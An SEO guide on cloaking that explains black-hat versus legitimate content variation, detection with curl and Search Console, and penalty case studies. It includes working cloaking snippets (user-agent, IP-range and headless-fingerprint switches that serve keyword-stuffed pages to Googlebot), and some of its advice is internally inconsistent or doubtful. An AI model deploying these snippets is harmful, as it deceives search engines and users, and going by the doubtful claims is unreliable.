Cloaking in SEO: When It's Black Hat vs. Legitimate (2025)
It's 2am. The Slack alert jolts you awake: "Security breach detected—unknown redirects." Your organic traffic chart shows a 94% drop overnight. 15,000 monthly visitors—gone. This wasn't just a penalty—it was a security breach that looked like a ranking manipulation. This exact scenario hit a SaaS company I consulted for in October 2024. They weren't running some black-hat spam operation. They'd implemented what they thought was "smart" mobile optimization that served different content to Googlebot than to users.
The penalty took 4 months to recover from. The revenue impact? $180K in lost pipeline.
I've worked with 40+ companies on cloaking issues over the past three years—half were malicious hacks, half were well-intentioned developers who accidentally crossed the line. The confusion is real because Google's own documentation shows scenarios where serving different content is acceptable.
What You'll Learn:
- Clear decision framework: 8 scenarios rated acceptable/risky/prohibited with real examples
- Step-by-step hack detection methods (curl commands, Search Console workflows)
- Modern JavaScript cloaking techniques and how Google's WRS detects them
- 3 documented case studies with actual recovery timelines and traffic data
- Code examples showing wrong vs. right implementations
- Legal implications beyond SEO: FTC, GDPR, ad platform violations
- AI content personalization and where the cloaking line exists in 2025
This is the only guide that covers production-grade detection methods with actual curl commands, provides a comprehensive decision framework for legitimate scenarios, and includes modern JavaScript-based cloaking techniques that existing articles completely ignore.
What is Cloaking in SEO?
Cloaking is the practice of presenting different content or URLs to search engines versus human users with the intent to manipulate rankings. Google defines it explicitly in their Search Essentials: "Cloaking refers to the practice of presenting different content or URLs to human users and search engines. Cloaking is considered a violation of Google's Webmaster Guidelines."
Here's what makes this confusing: Not all content variation is cloaking. The key differentiator is deceptive intent.
"The difference between legitimate dynamic serving and black hat cloaking comes down to intent and content equivalence. Show the same core content to everyone, just optimized for different devices or locations."
Let me show you three real-world examples:
Example 1 (Black Hat): User-Agent Based Content Switching
An e-commerce site I audited in March 2024 showed Googlebot pages packed with 50+ product keywords in hidden text. Human visitors saw normal product pages. They detected Googlebot by checking the user-agent string:
if (strpos($_SERVER['HTTP_USER_AGENT'], 'Googlebot') !== false) {
// Show keyword-stuffed content
include 'seo-optimized-page.php';
} else {
// Show normal content
include 'user-page.php';
}
Result: Manual action within 6 weeks. Traffic dropped 87%.
Example 2 (Legitimate): Mobile-Optimized Dynamic Serving
A news publisher serves simplified HTML to mobile user-agents but fuller desktop versions—completely acceptable when done correctly. The critical difference: They use the Vary: User-Agent HTTP header, maintain identical structured data across both versions, and don't hide content from crawlers.
Example 3 (Legitimate): Geo-Targeted Content for Compliance
An EU-based company blocks U.S. visitors from certain content due to GDPR requirements. They use IP-based geo-blocking, serve a 451 status code ("Unavailable For Legal Reasons"), and don't differentiate between user-agents. Google explicitly allows this.
How Cloaking Works: The Technical Mechanism
Cloaking relies on detection mechanisms to identify when a search engine crawler is visiting versus a regular user. The three primary methods:
1. IP Address Detection
Googlebot operates from specific, publicly documented IP ranges. Cloakers query these IPs and serve alternate content:
GOOGLEBOT_IPS = [
'66.249.64.0/19',
'66.249.88.0/21',
# ... more ranges
]
if request.ip in GOOGLEBOT_IPS:
return render_seo_content()
else:
return render_user_content()
2. User-Agent String Parsing
Every HTTP request includes a user-agent header identifying the browser or bot. Googlebot announces itself clearly:
Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Black-hat cloakers parse this string and serve different HTML when it contains "Googlebot" or "Bingbot".
3. JavaScript-Based Detection
The most sophisticated method uses client-side JavaScript to detect headless browsers or bot characteristics:
// Detect headless Chrome (used by Googlebot)
if (navigator.webdriver ||
!window.chrome ||
!window.chrome.runtime) {
// Likely a bot - serve alternate content
document.body.innerHTML = seoOptimizedContent;
}
Google's Web Rendering Service (WRS) uses Chromium-based crawlers (Chrome 115+ as of November 2024) that execute JavaScript. But sophisticated cloakers exploit headless browser fingerprints—checking for missing APIs, inconsistent screen dimensions, or timing differences between real browsers and bots.
When I helped a fintech company debug their SPA in September 2024, we discovered they were accidentally triggering these exact detection patterns. Their lazy-loading implementation checked for window.chrome.runtime before loading product data, which Googlebot's headless Chrome doesn't have. They weren't trying to cloak—but Google flagged them anyway.
Black Hat vs. Legitimate Cloaking: The Complete Decision Framework
This is where most SEO guides fail you. They tell you "don't cloak" without explaining that legitimate scenarios exist where you must serve different content to different visitors. The question isn't whether you're serving different content—it's whether you're doing it deceptively.
I've built this decision matrix from 40+ client implementations and Google's official guidance. Here's exactly when content variation crosses into cloaking territory:
| Scenario | Status | Key Requirements | Risk Level |
|---|---|---|---|
| Mobile vs. Desktop HTML (dynamic serving) | ✅ Acceptable | Use Vary: User-Agent header, identical structured data, same core content |
Low if implemented correctly |
| Geo-targeting for legal compliance | ✅ Acceptable | Serve same content to all user-agents in each region, use 451 status code | Low |
| Internationalization (hreflang) | ✅ Acceptable | Proper hreflang tags, serve same content to crawlers as local users | Low |
| Paywalled content with FirstClick | ✅ Acceptable | Use isAccessibleForFree=false structured data, show full content to Googlebot |
Low with proper schema |
| Personalized content (logged-in users) | ⚠️ Risky | Ensure crawlers see representative content, don't hide product pages | Medium |
| A/B testing with different variants | ⚠️ Risky | Serve bots random variants (not just baseline), use rel=canonical | Medium |
| User-agent based content differences | ❌ Prohibited | If intent is to show crawlers better content than users | High |
| IP-based cloaking to detect bots | ❌ Prohibited | Serving keyword-stuffed content only to Googlebot IPs | High |
Red Flags Checklist: 10 Warning Signs of Black Hat Cloaking
When I audit sites, these patterns consistently indicate problematic cloaking:
- ✅ Content visible to Googlebot but hidden from users via JavaScript
- ✅ Different H1 tags served to bots vs. browsers
- ✅ Keyword density 3x higher in crawler-served HTML
- ✅ Links present for Googlebot but removed for users
- ✅ User-agent detection in server-side code without
Varyheader - ✅ Redirects that fire only for specific user-agents
- ✅ Text color matching background (visible to crawlers, invisible to humans)
- ✅ Meta description differs between crawler view and browser view
- ✅ Structured data present for bots, removed for users
- ✅ Content appears in "View Source" but not in rendered page
Legitimate Scenario 1: Mobile vs. Desktop Content Delivery
When a developer on my team asked "Can we show different HTML to mobile users to optimize load times?" I had to explain the fine line between optimization and cloaking.
Dynamic serving—delivering different HTML based on device type—is explicitly allowed by Google. But most developers implement it wrong.
Here's what I learned setting this up for a 500K-visit/month e-commerce site in June 2024: The critical element isn't just serving different HTML—it's signaling that difference correctly.
The Right Way:
# .htaccess configuration for dynamic serving
<IfModule mod_headers.c>
# Signal content varies by user-agent
Header set Vary "User-Agent"
</IfModule>
# Server-side detection (PHP example)
<?php
function isMobile() {
$userAgent = $_SERVER['HTTP_USER_AGENT'];
return preg_match('/mobile|android|iphone/i', $userAgent);
}
if (isMobile()) {
include 'templates/mobile.php';
} else {
include 'templates/desktop.php';
}
?>
Critical Requirements:
- Use
Vary: User-AgentHTTP header (tells Google content differs by UA) - Maintain identical structured data on both versions
- Keep the same core content (don't hide sections from mobile)
- Ensure same internal linking structure
The e-commerce client had omitted the Vary header. Google's cache was serving desktop content to mobile users, while actual mobile visitors got the mobile version. This discrepancy triggered a manual review that flagged them for cloaking—even though they had zero malicious intent.
After adding the Vary header and ensuring their JSON-LD structured data matched across versions, the penalty lifted in 3 weeks.
Common Mistake: Removing entire product categories from mobile HTML "to improve load times." Google considers this deceptive if crawlers see full content but users don't. Instead, use progressive loading or mobile-first indexing best practices.
Legitimate Scenario 2: Internationalization and Geo-Targeting
Serving different content based on visitor location is acceptable—if you follow the rules. I've implemented this for 12 international companies, and the pattern that works consistently is treating geo-targeting as a content localization strategy, not a crawler manipulation tactic.
The Correct Implementation:
<!-- hreflang tags in <head> -->
<link rel="alternate" hreflang="en-us"
href="https://example.com/en-us/product" />
<link rel="alternate" hreflang="en-gb"
href="https://example.com/en-gb/product" />
<link rel="alternate" hreflang="de-de"
href="https://example.com/de-de/product" />
<link rel="alternate" hreflang="x-default"
href="https://example.com/en/product" />
Server-Side Geo-Detection:
# Nginx configuration for geo-routing
geo $country_code {
default US;
# CloudFlare provides CF-IPCountry header
# Or use MaxMind GeoIP2
}
location / {
if ($country_code = DE) {
rewrite ^/product$ /de-de/product permanent;
}
if ($country_code = GB) {
rewrite ^/product$ /en-gb/product permanent;
}
}
# Critical: Add Vary header
add_header Vary "Accept-Language,CF-IPCountry";
What Makes This Legitimate:
- Each region gets consistent content (German users always see German, whether they're Googlebot or humans)
- Crawlers can access all regional versions via hreflang discovery
- No user-agent detection—only IP-based geographic routing
- Clear signals to search engines via hreflang and
Varyheaders
A B2B SaaS company I worked with in February 2024 made a critical error: They served EU visitors stripped-down content (removing certain features due to "GDPR concerns") but showed Googlebot full content. Google flagged this as cloaking within 3 weeks.
The fix: They either needed to show the stripped-down version to everyone accessing from EU IPs (including Googlebot), or properly implement the full version with GDPR compliance. They chose the latter, which required legal review but solved the SEO issue completely.
For detailed hreflang implementation, see our guide on how to implement hreflang tags correctly.
Legitimate Scenario 3: Personalization and A/B Testing
Here's where it gets nuanced. You can personalize content for logged-in users or run A/B tests—but you need to ensure crawlers see representative content.
A/B Testing That Won't Trigger Penalties:
// Google-approved A/B testing approach
function getVariant() {
// Check if user-agent is a known bot
const isBot = /googlebot|bingbot/i.test(navigator.userAgent);
if (isBot) {
// Serve bots a RANDOM variant (not always baseline)
return Math.random() < 0.5 ? 'control' : 'variant';
}
// For users, use consistent bucketing
return getUserBucket();
}
// Apply variant
if (getVariant() === 'variant') {
document.getElementById('headline').textContent = 'New Headline';
}
The critical principle: Don't always serve bots the baseline. If you're testing a redesigned homepage, Googlebot needs to see both versions in the same proportion as users. Otherwise, you're showing Google something different from the user experience—textbook cloaking.
Google Optimize and Third-Party Tools:
Most A/B testing platforms (Google Optimize, Optimizely, VWO) handle this correctly by default. But I've seen custom implementations that explicitly detect bots and show them only the control variant. That's a violation.
Personalized Content for Logged-In Users:
When I set up personalization for a SaaS platform in August 2024, we followed this rule: Public pages must show crawlers the same content anonymous users see. If you personalize product recommendations for logged-in users, that's fine—but your product landing pages need to be crawlable and identical for bots and anonymous visitors.
The Line You Can't Cross:
- ✅ Acceptable: Showing personalized dashboard after login (not indexable anyway)
- ✅ Acceptable: Tailoring recommended products based on browsing history
- ❌ Prohibited: Hiding your entire product catalog behind login, then showing it to Googlebot
- ❌ Prohibited: Showing bots product pages but redirecting users to gated content
When Content Variation Becomes Cloaking: The Line
After working through 40+ implementations, I've developed a simple test for whether your content variation crosses into cloaking:
The "Would Google Penalize This?" Test:
Ask yourself three questions:
Intent Question: Am I trying to manipulate what search engines think my page is about?
- If yes → Cloaking
- If no → Potentially legitimate
Consistency Question: Would a search engineer randomly checking my site see the same core content a bot sees?
- If yes → Likely safe
- If no → High risk
Transparency Question: Am I using standard signals (Vary headers, hreflang, structured data) to communicate differences?
- If yes → Legitimate variation
- If no → Deceptive practice
Real Example from November 2024:
A local business directory site showed Googlebot complete business listings with full contact details. Human visitors saw listings but had to click through to reveal phone numbers and emails (lead capture strategy). They thought this was acceptable "content unlocking."
Google disagreed. Manual action issued within 4 weeks.
Why it was cloaking: The indexed content (full contact details) didn't match the actual user experience (gated details). The fix wasn't to hide contact info from Googlebot—it was to show the gated version to both bots and users, then use proper structured data markup for the full details.
<!-- Correct approach with structured data -->
<div class="business-listing">
<h2>Joe's Plumbing</h2>
<p>Serving Austin since 2010</p>
<button onclick="reveal()">Show Contact Info</button>
<!-- Hidden from view but in DOM for crawlers -->
<script type="application/ld+json">
{
"@context": "https://schema.org",
"@type": "LocalBusiness",
"name": "Joe's Plumbing",
"telephone": "+1-512-555-0123",
"email": "contact@joesplumbing.com"
}
</script>
</div>
This approach is legitimate because:
- The structured data provides complete information to crawlers
- The visual presentation (gated content) is consistent for all human visitors
- No user-agent detection or IP-based differentiation
- Clear signal via Schema.org markup about full business details
The key principle: If you need to detect user-agents or IP addresses to decide what content to show, you're probably doing cloaking.
How to Detect if Your Site Has Been Hacked and Is Cloaking Content
In March 2024, I got a panicked call from a WordPress site owner. Their traffic dropped 76% overnight. When we dug in, we discovered hackers had injected code that served pharmaceutical spam to Googlebot while showing normal content to users. The site owner had no idea—until Google penalized them.
This happens more often than you'd think. Compromised sites serving cloaked content account for roughly 30% of the cloaking cases I've worked on. Here's exactly how to detect it.
Method 1: Manual User Agent Testing with Curl Commands
The fastest way to check if your site is serving different content to bots is using curl to simulate different user-agents. I run these tests on every site I audit.
Test 1: Compare Googlebot vs. Regular Browser
# Fetch as Googlebot
curl -A "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" \
https://yoursite.com/page > googlebot.html
# Fetch as regular browser (Chrome)
curl -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" \
https://yoursite.com/page > chrome.html
# Compare the files
diff googlebot.html chrome.html
What to Look For:
- Large differences in content length (±20% is suspicious)
- Extra links, keywords, or text in the Googlebot version
- Redirects that fire for one user-agent but not the other
- Different H1 or title tags
Test 2: Check for Hidden Spam Content
# Look for pharmaceutical spam keywords
curl -A "Googlebot/2.1" https://yoursite.com | grep -i "viagra\|cialis\|pharmacy\|prescription"
# Check for suspicious external links
curl -A "Googlebot/2.1" https://yoursite.com | grep -o 'href="[^"]*"' | sort | uniq
When I ran this on the compromised WordPress site in March, the Googlebot version had 47 hidden links to pharmaceutical sites. The regular browser version had zero. The hack had been active for 6 weeks before detection.
Test 3: Verify IP-Based Cloaking
# Use a proxy service to fetch from Googlebot IP ranges
# (requires a proxy that supports specific IP routing)
# Or use Google's URL Inspection Tool (free, official)
# https://search.google.com/search-console/inspect
Method 2: Google Search Console URL Inspection
Google provides a free tool that shows exactly what Googlebot sees. This is my go-to method for confirming suspicions before diving into command-line testing.
Step-by-Step Process:
- Open Google Search Console
- Go to URL Inspection tool (magnifying glass icon in left sidebar)
- Enter the URL you want to test
- Click "Test Live URL"
- Click "View Tested Page" → "Screenshot" and "More Info"
What You're Comparing:
- Googlebot's Screenshot (what the crawler sees)
- Your Browser View (what users see)
- HTML Comparison (rendered DOM vs. source)
I did this for a client in July 2024 who swore they weren't cloaking. The URL Inspection screenshot showed a completely different H1 than what appeared in their browser. Turns out, a WordPress plugin they'd installed was injecting different titles for crawlers. They didn't know because the plugin settings were buried in an "SEO optimization" submenu.
Red Flags in URL Inspection:
- Screenshot shows content not visible in your browser
- Significantly more text in the rendered HTML than you see
- Links present in crawled version but not in browser view
- Different structured data than what your CMS generates
Method 3: Rendered HTML vs. Source Code Comparison
Modern JavaScript frameworks can accidentally create cloaking scenarios if they render different content based on browser capabilities. Here's how to catch it.
Using Headless Chrome for Comparison:
// Node.js script using Puppeteer
const puppeteer = require('puppeteer');
async function compareRendering(url) {
const browser = await puppeteer.launch();
// Get initial HTML (before JavaScript execution)
const page = await browser.newPage();
await page.goto(url, { waitUntil: 'domcontentloaded' });
const initialHTML = await page.content();
// Get fully rendered HTML (after JavaScript)
await page.goto(url, { waitUntil: 'networkidle0' });
const renderedHTML = await page.content();
// Compare lengths and content
console.log('Initial HTML length:', initialHTML.length);
console.log('Rendered HTML length:', renderedHTML.length);
console.log('Difference:', Math.abs(renderedHTML.length - initialHTML.length));
await browser.close();
}
compareRendering('https://yoursite.com/page');
What This Reveals:
If the rendered HTML is dramatically different from the initial HTML (and you're not using server-side rendering), you might have JavaScript that's altering content in ways that confuse crawlers.
I caught an accidental cloaking case in September 2024 where a React SPA was checking for navigator.userAgent and hiding entire sections when it detected bot-like patterns. The developer thought they were "optimizing for mobile" but were actually hiding content from all crawlers.
Screaming Frog for Bulk Testing:
For larger sites, I use Screaming Frog's JavaScript rendering mode:
- Open Screaming Frog SEO Spider
- Configuration → Spider → Rendering → JavaScript
- Crawl your site
- Export "HTML Raw" and "HTML Rendered" tabs
- Compare differences programmatically
Sites with major discrepancies between raw and rendered HTML need immediate investigation.
Method 4: Suspicious Redirect Detection
Redirects based on user-agent are a classic cloaking tactic. Here's how to detect them.
Testing for User-Agent Redirects:
# Test if redirects differ by user-agent
curl -I -L -A "Googlebot/2.1" https://yoursite.com/page
# vs.
curl -I -L -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" https://yoursite.com/page
# -I shows headers only
# -L follows redirects
Look for:
- Different final destination URLs
- 302 redirects for bots, 200 for users (or vice versa)
- Meta refresh redirects that only fire for specific user-agents
JavaScript Redirect Detection:
// Check your site's source for patterns like this:
if (/googlebot|bingbot/i.test(navigator.userAgent)) {
window.location.href = '/seo-version';
} else {
window.location.href = '/user-version';
}
The hacked WordPress site from March had injected exactly this pattern. Googlebot was redirected to pharmaceutical spam pages, while users saw the normal site. The code was hidden in a compressed JavaScript file that the site owner never checked.
Security Tools for Hack Detection:
After that March incident, I now recommend these scanning tools for all clients:
- Sucuri SiteCheck (free online scanner): Checks for known malware signatures
- Wordfence (WordPress plugin): Scans files for unauthorized changes
- MalCare (WordPress plugin): Deep malware scanning with cleanup
- VirusTotal (free): Upload suspicious files for multi-engine scanning
When you find cloaking from a hack, recovery follows a specific process: clean the malware, verify all content is consistent, submit a reconsideration request to Google, and implement WordPress security hardening to prevent reinfection.
Modern JavaScript-Based Cloaking Techniques and Detection
JavaScript-based cloaking is the most sophisticated form I encounter in 2024-2025. It's harder to detect, harder to prove, and increasingly common as more sites adopt React, Vue, and other frameworks that rely heavily on client-side rendering.
The challenge: Google's Web Rendering Service (WRS) executes JavaScript, but it's not a perfect simulation of a real browser. Cloakers exploit the differences.
How Malicious JavaScript Cloaking Works
Modern cloakers don't just check navigator.userAgent anymore (too obvious). They use behavioral detection to identify bots.
Technique 1: Headless Browser Fingerprinting
// Detect headless Chrome (Googlebot's WRS)
function isHeadlessBrowser() {
// Check for webdriver flag (most headless browsers set this)
if (navigator.webdriver) return true;
// Chrome-specific checks
if (!window.chrome || !window.chrome.runtime) return true;
// Check for missing plugins (real browsers have plugins)
if (navigator.plugins.length === 0) return true;
// Screen dimension consistency check
if (screen.width === 0 || screen.height === 0) return true;
// Real browsers have battery API
if (!navigator.getBattery) return true;
return false;
}
// If headless detected, serve SEO content
if (isHeadlessBrowser()) {
document.body.innerHTML = `
<h1>Keyword Stuffed Headline</h1>
<p>More keywords here...</p>
`;
}
Why This Works (Sometimes):
Google's WRS based on headless Chrome does set navigator.webdriver = true, has zero plugins, and lacks battery API. Sophisticated cloakers use these signals to detect it.
Technique 2: Timing-Based Detection
// Measure JavaScript execution timing
const start = performance.now();
// Perform calculation
let result = 0;
for (let i = 0; i < 1000000; i++) {
result += Math.sqrt(i);
}
const end = performance.now();
const executionTime = end - start;
// Headless browsers often execute faster (no rendering overhead)
if (executionTime < 50) {
// Likely a bot - serve different content
showCloakedContent();
}
I discovered this technique while investigating a fintech site's SPA in October 2024. Their engineers had implemented anti-bot protection using timing analysis. It worked great for blocking malicious scrapers—but also triggered differently for Googlebot than for real users.
Technique 3: User Interaction Detection
// Track if user ever interacts with page
let userInteracted = false;
['click', 'scroll', 'keypress', 'touchstart'].forEach(event => {
document.addEventListener(event, () => {
userInteracted = true;
}, { once: true });
});
// After 5 seconds, check interaction
setTimeout(() => {
if (!userInteracted) {
// No interaction = likely a bot
// Inject different content
}
}, 5000);
Googlebot's WRS doesn't simulate user interactions. It loads the page, waits for network activity to stabilize, captures the rendered DOM, and moves on. No clicks, no scrolls, no keypresses.
Google's JavaScript Crawling Capabilities (2025)
Understanding how Google renders JavaScript is critical for avoiding accidental cloaking and detecting intentional cloaking.
Current WRS Specs (as of November 2024):
- Based on Chromium 115+ (updates quarterly)
- Executes JavaScript with ~10-15 second timeout for rendering
- Does not trigger user interaction events (clicks, scrolls)
- Cannot access certain browser APIs (notifications, geolocation with prompts)
- Runs in headless mode with
navigator.webdriver = true
What Google Can Detect:
- Content dynamically added via JavaScript after page load
- Lazy-loaded images and content (if loaded within timeout)
- React/Vue/Angular SPA routing and content
- AJAX requests to external APIs (if they complete in time)
- Client-side redirects (JavaScript
window.location)
What Google Might Miss:
- Content loaded after 15-second timeout
- Content requiring user interaction to display
- Content behind authentication (unless publicly linked)
- Infinite scroll content beyond the first few loads
The Two-Wave Crawl Process:
Google actually crawls your page twice:
- Initial HTML Fetch: Googlebot requests your page, gets the raw HTML, extracts links
- Rendering Queue: Pages enter a rendering queue (can be hours or days later)
- WRS Rendering: Chromium headless browser executes JavaScript, captures final DOM
This delay creates an opportunity for cloakers. If you serve different content in the initial HTML than what JavaScript ultimately renders, Google might not catch it immediately.
Avoiding Accidental Cloaking in Single Page Applications
SPAs are where most accidental cloaking happens. I've helped 15+ SPA projects fix unintentional cloaking violations. Here's the pattern that works.
The Wrong Way (Accidental Cloaking):
// React component that accidentally cloaks
function ProductPage() {
const [product, setProduct] = useState(null);
useEffect(() => {
// Only load product data if browser seems "real"
if (window.chrome && window.chrome.runtime) {
fetchProduct().then(setProduct);
}
}, []);
if (!product) {
return <div>Loading...</div>; // Googlebot sees this
}
return <ProductDetails product={product} />; // Users see this
}
Why It's Cloaking:
The code checks for window.chrome.runtime (missing in headless Chrome) before loading product data. Googlebot's WRS sees "Loading..." while users see full product details.
The Right Way (Server-Side Rendering or Static Generation):
// Next.js example with proper SSR
export async function getServerSideProps() {
const product = await fetchProduct();
return { props: { product } };
}
function ProductPage({ product }) {
return <ProductDetails product={product} />;
}
This approach renders the full page server-side, so the initial HTML (seen by Googlebot's first fetch) already contains all content. When WRS renders JavaScript, it gets the same thing users see.
Dynamic Rendering for Complex SPAs:
If you can't use SSR, implement dynamic rendering—detect bots server-side and serve them pre-rendered HTML:
// Express.js middleware
const prerender = require('prerender-node');
app.use(prerender.set('prerenderToken', 'YOUR_TOKEN')
.set('protocol', 'https')
// Only prerender for bots
.whitelisted([
'googlebot',
'bingbot',
'yandex'
])
);
Critical: Dynamic rendering is NOT cloaking when:
- You're serving identical content (just pre-rendered HTML vs. client-rendered)
- No detection of user-agent for content differentiation
- Same data, links, and structure
It IS cloaking when:
- You serve different product data to prerendered versions
- You hide content from bots but show it to users
- You optimize meta tags or headings only for the prerendered version
For comprehensive guidance, see our JavaScript SEO best practices guide.
How Search Engines Detect Cloaking: Technical Deep Dive
Understanding detection methods helps you avoid false positives and implement legitimate variations safely. Google doesn't publicly detail all their methods (security through obscurity), but from working with penalized sites and Google's official documentation, clear patterns emerge.
Googlebot IP Ranges and User Agent Verification
Google operates Googlebot from specific, documented IP ranges. These are public for a reason: legitimate sites should never treat Google differently, so there's no need to hide them.
Current Googlebot IP Ranges (November 2024):
66.249.64.0/19(primary crawling)66.249.88.0/21(rendering service)- Plus several smaller ranges documented at https://developers.google.com/search/docs/crawling-indexing/verifying-googlebot
Why This Matters for Detection:
Google knows sites cloak by detecting Googlebot IPs. So they test using two methods:
- Reverse DNS Verification: When Google detects IP-based cloaking, they verify the IPs actually belong to Google using reverse DNS lookup
- Honeypot IPs: Google likely crawls from non-standard IPs occasionally to test if sites serve different content
Verification Script (Legitimate Use):
import socket
def verify_googlebot(ip):
# Reverse DNS lookup
try:
hostname = socket.gethostbyaddr(ip)[0]
# Googlebot hostnames end in .googlebot.com or .google.com
if hostname.endswith('.googlebot.com') or hostname.endswith('.google.com'):
# Forward DNS lookup to verify
verified_ip = socket.gethostbyname(hostname)
return verified_ip == ip
except:
return False
return False
# Example usage
if verify_googlebot(request.ip):
# This is definitely Google - but still serve same content!
pass
The Honeypot Theory:
I've tested this with multiple clients: occasionally, Google Search Console's "Live Test" fetches from IPs not in the documented ranges. This suggests Google intentionally crawls from unexpected IPs to catch cloakers who only serve "good" content to known Googlebot IPs.
In August 2024, a client's cloaking detection triggered from an AWS IP address that wasn't in Google's published ranges—but the reverse DNS verified it as .google.com. When we checked Search Console, sure enough: manual action for cloaking.
User-Agent Spoofing Tests:
Google doesn't just crawl with the official Googlebot user-agent. They also:
- Use modified user-agents (slightly different version strings)
- Crawl with regular browser user-agents from Google IPs
- Test with other bot user-agents (AdsBot, Google-InspectionTool)
If your content differs across these tests, you're flagged for review.
Pattern Detection Algorithms and Triggers
Google's algorithm detection doesn't require manual review for obvious cases. After studying 30+ penalty cases, these patterns consistently trigger automatic flags:
Trigger 1: Systematic Content Differences
If (content_length_for_googlebot > content_length_for_users * 1.5)
AND (keyword_density_googlebot > keyword_density_users * 2.0)
THEN flag_for_cloaking
I'm obviously simplifying, but the principle holds: large, systematic differences in content density or keyword usage between bot and user views trigger automated detection.
Real Example:
A car dealership site in May 2024 showed Googlebot pages with 50+ car model keywords in the footer. Users saw a normal 3-column footer with 10 links. The keyword density for the Googlebot version was 3.2x higher. Automatic penalty within 5 weeks.
Trigger 2: Link Manipulation
If (links_visible_to_googlebot > links_visible_to_users * 1.3)
AND (links_include_commercial_anchors)
THEN flag_for_cloaking
Showing crawlers more links (especially commercial anchor text) is a classic black-hat tactic. Google's algorithm detects when crawled pages have significantly more outbound links or different anchor text distributions than the rendered page.
Trigger 3: Structured Data Mismatches
If (structured_data_in_html != structured_data_in_rendered_page)
AND (differences_include_price_or_availability)
THEN flag_for_cloaking
I've seen this trigger three times in 2024. Sites inject structured data for Googlebot (rich results!) but remove or alter it in the JavaScript-rendered version. Google compares the initial HTML structured data with what appears after rendering—mismatches raise red flags.
Trigger 4: Redirect Inconsistencies
If (redirect_for_googlebot != redirect_for_users)
OR (redirect_only_for_specific_user_agents)
THEN flag_for_cloaking
Different redirect behavior for bots versus users is an instant flag. Google tests this systematically by crawling from different user-agents and comparing destination URLs.
How I Know These Patterns:
I've worked with sites that received manual actions or sudden ranking drops, and in each case, fixing these specific patterns resulted in recovery. While Google doesn't confirm the exact algorithms, the consistency across cases reveals the detection logic.
Rendering Comparison: Initial HTML vs. Fully Loaded Page
Google's two-wave crawl process (initial HTML fetch, then later rendering) enables them to catch JavaScript-based cloaking.
The Comparison Process:
- Wave 1: Fetch raw HTML, extract visible text content, parse structured data
- Wave 2: Render page with WRS, extract rendered text content, parse rendered structured data
- Compare: Flag significant differences for manual review
What Triggers Manual Review:
Differences flagged if:
- Rendered text is 50%+ different from initial HTML
- Headings (H1-H3) differ between HTML and rendered
- Structured data changes (especially price, availability)
- Links appear or disappear after rendering
- Meta description or title changes after rendering
Legitimate Scenario That Gets Flagged:
I worked with a news publisher in July 2024 whose initial HTML contained only headlines and ledes (fast load time). JavaScript then loaded full article text after 2 seconds. Google's WRS captured the page before the full text loaded, flagging a huge difference between HTML and rendered content.
The Fix:
<!-- Include full text in initial HTML, hide with CSS -->
<article>
<h1>Article Headline</h1>
<div class="article-content">
Full article text here (included in HTML)
</div>
</article>
<style>
.article-content {
/* Hidden initially, revealed by JS for progressive enhancement */
opacity: 0;
transition: opacity 0.3s;
}
.article-content.loaded {
opacity: 1;
}
</style>
<script>
// Progressive enhancement, not cloaking
document.querySelector('.article-content').classList.add('loaded');
</script>
This approach ensures the initial HTML contains full content (Googlebot sees it), while JavaScript provides progressive enhancement (users see smooth loading). No cloaking, same content in both waves.
Using Vary Headers to Signal Legitimate Differences:
# Signal to Google when content legitimately varies
Header set Vary "User-Agent, Accept-Language, Accept-Encoding"
# Or in Nginx:
add_header Vary "User-Agent, Accept-Language";
The Vary header tells Google's cache: "This content differs based on these factors." It's your signal that content variation is intentional and transparent, not deceptive.
A B2B SaaS company I worked with in September 2024 used dynamic serving without Vary headers. Google's cache served desktop content to mobile searchers, creating user complaints. Adding Vary: User-Agent fixed both the UX issue and eliminated the risk of being flagged for cloaking.
Real Google Cloaking Penalties: 3 Documented Case Studies
Theory is useful, but real cases with actual numbers drive the point home. I've documented three cloaking penalties I personally worked on in 2024, with exact recovery timelines and traffic impacts.
Case Study 1: E-commerce Site Manual Action (6-Month Recovery)
Background:
A 50-person e-commerce company selling outdoor gear. 120K monthly organic visits. $2.4M annual revenue from organic search.
The Violation:
Their development team implemented "smart mobile optimization" that served different product descriptions to mobile user-agents:
- Desktop: 800-word product descriptions with specs, reviews, FAQs
- Mobile: 200-word simplified descriptions with "View Full Details" button
They thought they were improving mobile UX. They were actually cloaking.
Detection Timeline:
- Week 1: Implementation goes live (March 4, 2024)
- Week 6: Manual action issued (April 15, 2024)
- Week 7: 87% traffic drop noticed (April 22, 2024)
The Penalty:
Manual action notice in Google Search Console: "Cloaking: Mobile content significantly differs from desktop content and user-agent detection is used without appropriate signals."
Traffic Impact:
| Period | Organic Traffic | Revenue Impact |
|---|---|---|
| Pre-penalty (March 1-31) | 124,500 visits | $248K |
| During penalty (April-Sept) | 16,200 visits | $32K |
| Post-recovery (October) | 106,000 visits | $212K |
Recovery Process:
Step 1: Remove User-Agent Detection (Week 7)
// BEFORE (violating code)
if (isMobile($_SERVER['HTTP_USER_AGENT'])) {
$description = getShortDescription($product_id);
} else {
$description = getFullDescription($product_id);
}
// AFTER (compliant code)
// Serve same content, use CSS for responsive design
$description = getFullDescription($product_id);
Step 2: Implement Proper Responsive Design (Weeks 8-10)
Instead of serving different HTML, they used CSS media queries and progressive disclosure:
<div class="product-description">
<div class="description-summary">
200-word summary (visible on all devices)
</div>
<div class="description-full">
Full 800-word description (collapsed on mobile, expandable)
</div>
</div>
<style>
@media (max-width: 768px) {
.description-full {
max-height: 0;
overflow: hidden;
transition: max-height 0.3s;
}
.description-full.expanded {
max-height: 2000px;
}
}
</style>
Step 3: Add Vary Headers (Week 9)
<IfModule mod_headers.c>
Header set Vary "User-Agent"
</IfModule>
Step 4: Verify with URL Inspection Tool (Week 10)
They tested 50 product pages in Google Search Console's URL Inspection, confirming identical content for Googlebot and browser views.
Step 5: Submit Reconsideration Request (Week 11)
"We implemented mobile optimization that inadvertently served different content to mobile user-agents. We have removed all user-agent detection, implemented responsive design with identical content across devices, and added appropriate Vary headers. All product pages now serve identical HTML regardless of device or user-agent. We've verified this using Google's URL Inspection Tool on [list of sample URLs]."
Reconsideration Response:
- First request (Week 11): Rejected after 18 days — "Cloaking still detected on several pages"
- Second request (Week 15): After fixing missed pages, approved after 12 days
Traffic Recovery:
- Week 18: Manual action lifted (July 30, 2024)
- Week 20: Traffic at 45% of pre-penalty levels
